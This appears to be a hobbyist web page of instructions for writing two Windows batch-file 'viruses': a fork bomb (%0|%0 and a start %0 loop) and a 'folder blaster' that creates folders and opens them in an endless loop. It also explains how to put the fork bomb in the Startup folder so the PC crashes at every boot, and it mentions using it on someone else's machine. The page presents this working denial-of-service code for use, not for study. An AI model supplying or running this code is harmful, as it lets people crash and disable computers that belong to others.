top of page

Fork Bomb

 

This one is easily the most effective of the two being showcased here. A fork bomb is the equivilant of a dos/ddos attack on your own system. (Or whoevers your doing it on) This generally is very simple to understand. All it is doing is refusing your system its ram (Random Access Memory) and causing it to crash. This although harmless can be very anoying. If you create this to execute at start up (See Bellow) then every time the pc starts it will crash shortly after making it technically unusable.

Follow these steps:

 

1) As with all batch file viruses open up notepad.

 

2)Type in the following:

%0|%0

 

3)Save as crash.bat (Or anyname as long as .bat is on the end) and then you can run it. (Remember to allways change to all file types)

 

If you think thats to easy all this is is the following code compressed (if above dosen't work try the following)

 

:s

start %0

goto s

 

line 1 is creating a checkpoint, the pc goes to this on line 3 start %0 is just telling it to run the .bat file again

 

To make this execute when the pc turns on do the following:

1) Right click on the crash.bat and create a shortcut

2) Open up the start menu in 'all programs' open the startup folder

3) Copy/Cut and paste the shortcut into this folder

crash.bat will now open at startup

Folder Blaster

All the folder blaster does is create and open millions of folders then opens them although the code is roughly 25 lines long it creates many many many folders.

Follow these steps:

 

1) As with all batch file viruses open up notepad.

 

2)Type in the following:

@echo off

cd ./Desktop

md 1

md 2

md 3

md 4

md 5

md 6

md 7

md 8

md 9

md 0

:confirm

start 1

start 2

start 3

start 4

start 5

start 6

start 7

start 8

start 9

start 0

goto confirm

 

3)Save as any_name.bat (As always change to all file types)

 

bottom of page